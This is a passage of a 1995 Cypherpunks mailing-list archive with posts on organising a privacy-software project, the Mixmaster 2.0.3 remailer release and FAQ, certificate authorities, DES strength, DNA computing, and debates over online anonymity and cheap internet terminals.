>Microsoft/Netscape builds it. This last outcome might not be so bad, but
>only in the first one can we rely on our principles being advanced.

This is a very important period. The technology is young enough that a
window is open for a non-giant to produce a dominant product.

On the other hand, it takes actual coordination of resources. I'm not sure
that it is within the range of Cypherpunks to take advantage of this
window. There is still no agreement whether the group can be said to have a
single vision, nor whether people within it want to be bounded by another's
view.

If people really wish to take advantage of this and really push things, it
means forming a group, made up of Cypherpunk members perhaps, but much
smaller, and capable of working together. Also capable of handling not only
the theory, but good solid code, GUI, PR, meetings, talking to the
government, etc.

It is an open window yes, but not a simple one. I'd love to see widespread
use of secure encryption, however I don't think the potential exists within
the Cypherpunk framework to reach it as 'Cypherpunks'. The question then
is, whether Cypherpunks should change, or whether a smaller group will be
formed.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Tue, 28 Nov 1995 05:50:32 +0800
To: c2.org.mix-l@jpunix.com
Subject: Announcement: mixmaster 2.0.3 released!
Message-ID: <199511272121.NAA00088@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Announcing the release of Mixmaster version 2.0.3
Among other improvements it includes a new and
improved Makefile. Installing Mixmaster is a SNAP!

For information about Mixmaster, and how to get it,
check out http://obscura.com/~loki or read the Mixmaster FAQ
which will be posted soon.

	-Lance




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 28 Nov 1995 05:57:51 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d08acdfd6f40be1@[157.22.240.13]>
Message-ID: <Pine.SUN.3.91.951127130923.21091A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 27 Nov 1995, Jonathan Zamick wrote:

> This is a very important period. The technology is young enough that a
> window is open for a non-giant to produce a dominant product.

Full agreement.

> On the other hand, it takes actual coordination of resources. I'm not sure
> that it is within the range of Cypherpunks to take advantage of this
> window. There is still no agreement whether the group can be said to have a
> single vision, nor whether people within it want to be bounded by another's
> view.
> 
> If people really wish to take advantage of this and really push things, it
> means forming a group, made up of Cypherpunk members perhaps, but much
> smaller, and capable of working together. Also capable of handling not only
> the theory, but good solid code, GUI, PR, meetings, talking to the
> government, etc.

Right.

> It is an open window yes, but not a simple one. I'd love to see widespread
> use of secure encryption, however I don't think the potential exists within
> the Cypherpunk framework to reach it as 'Cypherpunks'. The question then
> is, whether Cypherpunks should change, or whether a smaller group will be
> formed.

I think that changing the focus of cypherpunks is intractable enough that 
forming a new group is the only feasible alternative. Right now, I don't 
have the time to try to form such a group, but I would be an enthusiastic 
participant if such a group was to be formed.

Incidentally, I've had one bad experience with this type of thing (it was
the PGP 3.0 development team), so I realize it's not easy. A couple of
things I've learned from the experience: 

* Clear goals.

* A leader, someone who would call the shots, and would also serve as the
person you'd have to convince.

* Open communications. Shrouding a project in secrecy is a good way to 
kill it. This is one potential advantage we have over the spooks.

It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
Gutmann, and others have proved themselves quite capable of writing good
solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
Dan Bernstein, and some others (who I'm not sure want to be named) are
talking to the government. GUI I'm less sure about, but I'd hope that some
cpunks would come out of the woodwork.

It is not a matter of ability, but of will.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 28 Nov 1995 06:02:34 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: The future will be easy to use
Message-ID: <v02120d0aacdfe235b0b7@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


>* Clear goals.
>
>* A leader, someone who would call the shots, and would also serve as the
>person you'd have to convince.
>
>* Open communications. Shrouding a project in secrecy is a good way to
>kill it. This is one potential advantage we have over the spooks.
>
>It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
>Gutmann, and others have proved themselves quite capable of writing good
>solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
>Dan Bernstein, and some others (who I'm not sure want to be named) are
>talking to the government. GUI I'm less sure about, but I'd hope that some
>cpunks would come out of the woodwork.
>
>It is not a matter of ability, but of will.

It is also a matter of funding of course. While development can be donated
time, the rest often takes money. Still, it's something to look into.
Handling RSAREF is sapping much of my time, otherwise I'd jump right in,
however I like to always pause before committing my time to endeavors. I
wouldn't mind helping out though. Certainly Consensus probably has some
resources with its own contacts to contribute.

I agree with your points though. Another thing to consider, are some
alternate methods of enterprise design that involve better communication,
iteration of goals vs product, etc. (Actually I need to work on a speech
about this that is coming up soon. Yet another project. :)

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 28 Nov 1995 03:32:41 +0800
To: cypherpunks@toad.com
Subject: re: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <Pine.BSD/.3.91.951127135434.7490A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


"Lynne L. Harrison" <lharrison@mhv.net>:
>  There may be *an ulterior motive* of getting the person's ssn, i.e., for
>the purpose of the newspaper (and the winner) reporting winnings to IRS.  In
>addition, the newspaper may also feel that, in selecting a 10-digit number,
>it probably will not repeat such as someone's birthdate.  Personally, I lean
>towards the former.

Why not just make giving up your SS# a condition of receiving
the prize *if* you are a winner like lotteries do?  I think the real 
reason is they need a unique number and are lazy and uncreative about 
generating one from the info people send in.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 28 Nov 1995 04:34:44 +0800
To: alex@proust.suba.com (Alex Strasheim)
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
In-Reply-To: <199511271654.KAA02460@proust.suba.com>
Message-ID: <199511272026.PAA11253@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alex Strasheim wrote:

| The Chicago Sun-Times is running a contest in which readers are asked to
| send in their social security numbers.  Someone will win a cash prize
| after a random drawing. 

	Sounds like a prime time to misremember your social security
number.  Alternately, transpose digits, make 6's and
8's indistinguishable, etc.  Don't see it as oppression; see it as a
prime chance to monkeywrench another database.

Adam '119 36 3801'

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 28 Nov 1995 06:34:56 +0800
To: remailer-operators@c2.org
Subject: New Mixmaster
Message-ID: <199511272220.QAA28147@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Lance's new Mixmaster 2.0.3 is also available on vishnu.alias.net via
the normal methods.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zuhn@sctc.com (david d `zoo' zuhn)
Date: Tue, 28 Nov 1995 06:39:36 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d0aacdfe235b0b7@[157.22.240.13]>
Message-ID: <199511272224.QAA20539@spirit.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


I would posit that any "Cypherpunks" group arranged to "write the software
for privacy" would rapidly get bogged down in the sorts of problems that
Raph mentioned, as well as a host of others.  The inter-person politics of
the free software groups on the Internet are amazing (and something I like
to avoid these days).

On the technical side, what piece of software do we need for privacy? 
Well, anonymizing WWW re-servers.  Better interfaces to secure mail. 
Better interfaces to the anonymous remailers.  Remailer-as-delivery (e.g,
mailing a delivery ticket which the recipient would have to use in order
to get the message from the remailer).  IPsec.  Reputation & certification
systems.  Inter-site encryption.  The list goes on (and on).

And then what platform do you aim for?  

I see the value of the cypherpunks list as a meeting point for a wide
variety of folks, each of whom is likely to go off to do work in their own
area, with new perspective on the values of privacy.

The value of the list as a conjunction of pro-privacy folks is much
greater than its value as a list where implementation of some application
can be coordinated.   If nothing else, the amount of work to be done is
greater than that doable even if every member of the list sat down to
write code full-time.
Not that we couldn't get amazing things done, but...

ObSpoilsporting over.  Go for it, and best of luck to you.

-- 
david d `zoo' zuhn   ---  secure computing corporation
zuhn@sctc.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joey Grasty X3697 P6611 <jgrasty@pts.mot.com>
Date: Tue, 28 Nov 1995 06:36:00 +0800
To: cypherpunks@toad.com
Subject: Judge won't drop Netcom from suit
Message-ID: <30BA3798.2781E494@pts.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out the story on the Scientology suit. 

http://www.sjmercury.com/scie1127.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Tue, 28 Nov 1995 10:56:05 +0800
To: c2.org.mix-l@jpunix.com
Subject: Mixmaster Remailer FAQ
Message-ID: <199511280121.RAA05114@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Frequently Asked Questions about Mixmaster Remailers
FAQ Version 1.7 Nov 27 1995
by Lance Cottrell

This document is a semi-technical discussion of Mixmaster remailers.
I wrote this to answer questions often asked by new users of Mixmaster,
and to explain why you would want to use Mixmaster remailers.
At the end of this FAQ is a list of currently active Mixmaster remailers.


**Announcements**

I am pleased to announce the release of Mixmaster 2.0.3
It contains many bug fixes, and a much improved Makefile which
makes compiling a snap!


**What is Mixmaster?**

Mixmaster is a new class of anonymous remailers, inspired by the existing
"cypherpunk" remailers and discussions on the Cypherpunk mailing list.
Mixmaster is the next generation in the evolution of remailer technology.


**What is an anonymous remailer?**

Quoting from Andre Bacard's remailer FAQ:

  An anonymous remailer (also called an "anonymous server")
  is a free computer service that privatizes your e-mail.
  A remailer allows you to send electronic mail to a Usenet
  news group or to a person without the recipient knowing
  your name or your e-mail address.

For a non-technical introduction to remailers (not including Mixmaster),
I recommend Andre's FAQ. It is posted regularly to:
  alt.privacy
  alt.privacy.anon-server
  alt.anonymous

or you can get it by sending mail to:
  To: abacard@well.com
  Subject: Help1
  Message: [Ignored]

There is also a version on the World Wide Web.
<http://www.well.com/user/abacard/remail.html>


**What do I need to use Mixmaster remailers?**

Unlike other remailers, you can't just make your own message and send it
to the remailer. Mixmaster's security comes in part from using a special
message format. The disadvantage of this is that you need a special 
program to make the message for you. Once you have that program 
(the client) remailing is as easy as running the program, and telling it
which remailers you want to use.


**How do I get the Mixmaster client software?**

There are two sites for distribution. The first is my machine,
http://obscura.com/~loki/Welcome.html/
or ftp to obscura.com and read /pub/remail/README.no-export.
The other is by anonymous ftp to jpunix.com.

You will have to follow the instructions there to get Mixmaster.
Because Mixmaster contains cryptography, it may not be exported 
from the U.S. and Canada. The reason for the circuitous route to download
Mixmaster is to show my good faith efforts to keep Mixmaster from being
exported. I have heard rumors that someone has already broken this law,
and that Mixmaster is available from Europe. I do not approve of this
and will not support that site.


**How do I get the software to run a Mixmaster remailer?**

The remailer software is available from the same sites as the client.


**But I only see one Mixmaster distribution?**

The same program is used for both the client and the remailer. The only
difference is in the installation. For the client you just compile it
and you are ready to go. For the remailer, you need to set up mail
forwarding and cron jobs.


**What kinds of computers does Mixmaster run on?**

Unfortunately, not PCs or Macs. But it is being ported to those right now.
Mixmaster runs under UNIX. The only machine it is known not to work on
is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3,
Solaris, and several others. It has been compiled and tested on Netcom. 
If you use it on a machine or service not on this list, please let me 
know so I can add it.


**How does Mixmaster work, and why should I use it?**

You should use Mixmaster if you want the highest level of anonymity
available, or if you are tired of building remailer messages yourself.
A discussion of how Mixmaster provides this level of security is beyond
the scope of this FAQ, but I put an essay on the subject on my home page.


**Does Mixmaster use PGP?**

No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own
keys and key file formats. To add a key to a key ring, simply append 
the key to your key file using your favorite text editor.


**Can Mixmaster post to News?**

Yes, like older remailers some Mixmaster remailers can post to news.
Also like older remailers, not all Mixmaster remailers can post
to news. Request the remailer's help file to check if it supports
posting. Do this by sending mail to the remailer with the subject line 
	remailer-help.
 

**When Was Mixmaster Released?**

Mixmaster was originally released on an experimental basis in late
1994. There were only ever two remailers running Mixmaster 1.0.
Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly
available Mixmaster remailers.


**What is the latest version of Mixmaster?**

Version 2.0.3 was released on Nov 27, 1995. This version uses a new
Makefile, which makes compiling it a snap. Several bugs were also fixed,
and some esoteric functions added.

Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can
now accept messages containing multiple Mixmaster packets. Mixmaster
can be told to choose a random set of remailers to chain your message
through. It will now route multiple packet messages over independent
chains. Several minor bugs were fixed.

Version 2.0.1 was released on May 27, 1995. The only changes from 2.0
are some improvements in the documentation, and the inclusion of a 
more up to date list of remailers.


**What remailers run Mixmaster?**

The most recent list of remailers is available on my homepage,
along with the remailer list and key file for Mixmaster. You can simply
replace your old files with the ones from my site to keep up to date.
They are also available by ftp.

Here is the current list of Mixmaster remailers. Send mail to the
remailer with the subject remailer-key to retrieve the remailer's
Mixmaster key.

   mix         mixmaster@obscura.com
   vishnu      mixmaster@vishnu.alias.net
   knight      mixmaster@aldebaran.armory.com
   robomix     robo@c2.org
   syrinx      syrinx@c2.org
   replay      remailer@replay.com
   hacktic     remailer@utopia.hacktic.nl
   crynwr      remailer@crynwr.com
   spook       remailer@spook.alias.net
   flame       remailer@flame.alias.net
   Armadillo   remailer@armadillo.com
   anon        mixmaster@anon.alias.net
   secrets     secret@secret.alias.net
   wmono       wmono@valhalla.phoenix.net
   ecafe-mix   mixmaster@remail.ecafe.org
   aD          anon@ad.org
   shinobi     remailer@shinobi.alias.net
   amnesia     amnesia@chardos.connix.com
   q           q@c2.org
   precipice   mixmaster@mix.precipice.com

Since this is a new FAQ, I am sure it is far from comprehensive. Watch
this space for changes to the FAQ. It will be evolving rapidly for a
while. Please send any questions you think should be here to:

Lance Cottrell <loki@obscura.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Tue, 28 Nov 1995 07:14:00 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d08acdfd6f40be1@[157.22.240.13]>
Message-ID: <9511272256.AA13473@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


One more time for the security/cypher-impaired (me at least).

I suspect there are a fair number of lurkers here who code for a living
and would be willing to contribute if someone/the_group can articulate
a requirements statement and then push it to the design stage.

I bring nothing cypher-wise. I would be willing to help walk the
s/w-engineering dog and to write Motif/X/socket if the chosen platform
is UN*X, however.

So, from an engineering standpoint, what should the "future" look
like?

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Tue, 28 Nov 1995 00:37:11 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <30B99C34.2A1F@netscape.com>
Message-ID: <Pine.SOL.3.91.951127180832.25120B-100000@sun.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, Jeff Weinstein wrote:

> Alex Strasheim wrote:
> > 
> > > Basically when the browser finds a new CA that it does know about it prompts
> > > the user and through a series of dialog boxes the user chooses to trust it
> > > or not.
> > 
> > Is anyone running an ssl web server that would let us see how this works?
> 
>   A little bird pointed me toward https://www.secret.org.  I have no
> idea who they are...

Another way to see the dialog boxes is to delete one of the CA's that 
came with Netscape Navigator and then connect to for example 
https://www.netscape.com/

What software is available (preferably non-commercial) to become a 
CA? Is for example the SSLeay package enough?


Jri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 28 Nov 1995 09:42:17 +0800
To: cypherpunks@toad.com
Subject: Meeting: Austin, TX
Message-ID: <199511280130.TAA00326@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

The Austin Cypherpunks will be meeting this Saturday from 6-8pm at Ted's
Greek Restaurant on Congress between 4th and 5th. We will be taking the
tables in the rear.

The main topic of discussion will be the proposed 1 hour public access video
on cryptography. Also we will be discussing making some form of monthly
key-signing.

Hope to see you there!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 28 Nov 1995 09:48:45 +0800
To: remailer-operators@c2.org
Subject: The corrected Mixmaster
Message-ID: <199511280131.TAA02826@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The corrected mixmaster 2.0.3 is also available on vishnu.alias.net
via the normal methods. I apologize for any inconvenience.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Tue, 28 Nov 1995 16:33:19 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Terminals
Message-ID: <v03003d01ace034532775@[204.250.84.3]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate sez:
>Forwarded message:
>
>> Subject: Re: The future will be easy to use
>> From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
>> Date: Mon, 27 Nov 95 21:28:05 EST
>>
>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this week's PC Week or Mac Week, as they both
>have several articles discussing this. Bottom line is that the under $1000
>computer seems to have no future either in industry or the home.
>
I agree and disagree. ;-)

The "internet terminal", or "internet appliance", as it is sometimes called,
is IMHO, worthless. Would you write and send e-mail if you had no way of
archiving it? Would you use "net-quicken", if it required all your data to
be stored on a shared disk at Intuit? (There was an interview on NPR 11/17
where this was touted as "the next big thing"!)

On the other hand, I believe that a <$1000 computer would be a big seller.
From a marketing point of view, there's just something about a price tag
with three digits left of the decimal point, even if they're all nines :-)
The tough part is making it usable, and making some money on it.
[ I've got this 386-40, with 1 MB RAM and a 40MB hd, see... ]


>Realistically, who in their right mind would buy a diskless workstation to
>connect to Internet?
>
No one.

>You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>
Actually, I think the plan is to boot from ROM.

>Anyone who bases their business on this technology won't have a business.
>
I agree.


-- Marshall

Marshall Clow	              Aladdin Systems
mclow@mailhost2.csusm.edu

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 28 Nov 1995 10:16:13 +0800
To: remailer-operators@c2.org
Subject: key changes for secret.alias.net
Message-ID: <199511280159.TAA03326@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello everyone,

	secret.alias.net suffered a key change when installing the new
Mixmaster code. Be sure to get the new key from vishnu.alias.net via
http://vishnu.alias.net/pubring.mix.html and type2.list.html. It's also
available by ftp from vishnu.alias.net.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 28 Nov 1995 12:31:23 +0800
To: cypherpunks@toad.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <199511280404.UAA03020@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


>  I am curious on whether there are any applications of the directed
> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
> reason for asking is that I've come across something in my field (molecular
> genetics) that can be used to solve such problems in a couple of weeks or so.
>  -Allen
> 
> 
Secret sharing can be done by Hamiltonian paths.  No public key code has been
found to take advantage of those, or any other NP complete problem, so far as
I know.  DNA computing really doesn't solve the Hamiltonian graph problem, it
just makes the biggest one that you can solve a little bit bigger.  500 point
graphs remain insoluble (pun unintended) for earth-sized vats of DNA. 

Really.

-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 Nov 1995 09:24:48 +0800
To: cypherpunks@toad.com
Subject: Cyberangels vs Anonymnity
Message-ID: <01HY5FBP59SG8WYPHF@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Here's the section from the Cyberangel FAQ which should explain why
I put the addresses on the list. Given that their main tactic so far is telling
ISPs, I would guess that any unauthorized remailers may be in trouble... once
they get a clue enough to spot them. Yes, the shouting is theirs.
	-Allen

  _9) WHAT KINDS OF CHANGES WOULD THE GUARDIAN ANGELS / CYBERANGELS LIKE TO
  SEE?_
  
  
  A) WE WOULD LIKE TO SEE AN IMPROVEMENT IN USER IDENTIFICATION. USER ID IS
  IMPOSSIBLE TO VERIFY OR TRACE BACK. THE VERY ANONYMITY OF USERS IS ITSELF
  CAUSING AN INCREASE IN RUDENESS, SEXUAL ABUSE, FLAMING, AND CRIMES LIKE
  PEDOPHILE ACTIVITY. WE THE NET USERS MUST TAKE RESPONSIBILITY FOR THE PROBLEM
  OURSELVES. ONE OF OUR DEMANDS IS FOR MORE ACCOUNTABLE USER IDS ON THE NET.
  WHEN PEOPLE ARE ANONYMOUS THEY ARE ALSO FREE TO BE CRIMINALS. IN A RIOT YOU
  SEE RIOTERS WEARING MASKS TO DISGUISE THEIR TRUE IDENTITY. THE SAME THING IS
  HAPPENING ONLINE. WE WOULD LIKE TO SEE USER ID MUCH MORE THOROUGHLY CHECKED
  BY INTERNET SERVICE PROVIDERS.
    ________________________________________________________________________
  
  CYBERANGELS         EMAIL ADDRESS: ANGELS@WAVENET.COM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Tue, 28 Nov 1995 10:54:32 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511271952.LAA26633@ix3.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951127201852.6314C-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 27 Nov 1995, Bill Stewart wrote:

> Signatures often have known, or easily guessed, plaintext in them,
> like the signer's name or ID number, or various header fields
> such as X.509's equivalent to ----- BEGIN PGP ....

  If the signature is padded with random junk on the end, then it makes 
it harder to do a known text attack.  There was a message a few days ago 
by Anderson and someone else (in England) that dealt with weaknesses in 
some encryption protocols.  It was good to read.

> DES isn't worthless.  It's a bit weak, but not worthless.

  Even though he didn't have proof Bruce Schneier stated in "Applied 
Cryptography 2nd Ed" that the NSA might have a machine that can crack DES 
in 15 mins, and maybe as low as 3-5, as one was built and sold.  The book 
can explain it more, as I am doing this from memory.
  Take care and have fun.
 
==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@sunflash.eng.usf.edu>
Date: Tue, 28 Nov 1995 09:54:55 +0800
To: "Jack P. Starrantino" <jps@monad.semcor.com>
Subject: Re: The future will be easy to use
In-Reply-To: <9511272256.AA13473@monad.semcor.com>
Message-ID: <Pine.SUN.3.91.951127203639.6314F-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 27 Nov 1995, Jack P. Starrantino wrote:

> I suspect there are a fair number of lurkers here who code for a living
> and would be willing to contribute if someone/the_group can articulate
> a requirements statement and then push it to the design stage.

  As soon as PGP 3.0 is released I am planning on incorporating PGP into 
Pine, and start putting it into more programs, to increase the usage of 
encryption things before they go out.
  I am planning on adding a chat ability to a browser, and hopefully that 
will be encrypted, as well.
  Take care and have fun. (from a lurker)

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 10:01:45 +0800
To: cypherpunks@toad.com
Subject: Re: Cray's New T3E
In-Reply-To: <199511280140.CAA25757@utopia.hacktic.nl>
Message-ID: <199511280146.UAA11393@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Couldn't you have just posted a pointer to this instead? Yes, we know
faster computers are being built. It's not crypto-relevant,
though. Sure, the NSA will buy some, but that is hardly news or
interesting.

Anonymous writes:
> WSJ, Nov 27, 1995
> 
> Cray Research to Unveil 2nd-Generation Parallel Processor
> for Technical Market
> 
> By William M. Bulkley




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 28 Nov 1995 11:01:56 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <199511280254.UAA00156@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: The future will be easy to use
> From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
> Date: Mon, 27 Nov 95 21:28:05 EST
> 
> One thing that David didn't mention is security add-ons to the "network
> computers" that are supposed to be rolled out within the next few months --
> the successors to X terminals, $500 boxes with a good screen/sound,
> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
> I expect some folks to make a good living by writing add-ons (including
> crypto add-ons) to these gizmos.
> 

Don't hold your breath. The current market surveys say that there is no
market for them. Check out this week's PC Week or Mac Week, as they both
have several articles discussing this. Bottom line is that the under $1000
computer seems to have no future either in industry or the home.

Realistically, who in their right mind would buy a diskless workstation to
connect to Internet? You certainly wouldn't do crypto on it because it has
to boot from somewhere else and this leaves all kinds of security holes.
Also, there is the fact that at the current time there are no generally
useable apps on Internet beyond the web and most companies would rather have
their employees doing something more productive than hanging ten.

Anyone who bases their business on this technology won't have a business.

Take care.

                                         Jim Choate
                                         CyberTects
                                         ravage@einstein.ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 Nov 1995 10:28:55 +0800
To: cypherpunks@toad.com
Subject: Directed Hamiltonian Path Problem
Message-ID: <01HY5GZFNPQO8WYPHF@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I am curious on whether there are any applications of the directed
Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
reason for asking is that I've come across something in my field (molecular
genetics) that can be used to solve such problems in a couple of weeks or so.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 28 Nov 1995 04:39:16 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <9511272025.AA16830@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
 > > Is anyone running an ssl web server that would let us see how this works?
 > 
 >   A little bird pointed me toward https://www.secret.org.  I have no
 > idea who they are...
For those that want to know what's there without wasting their time
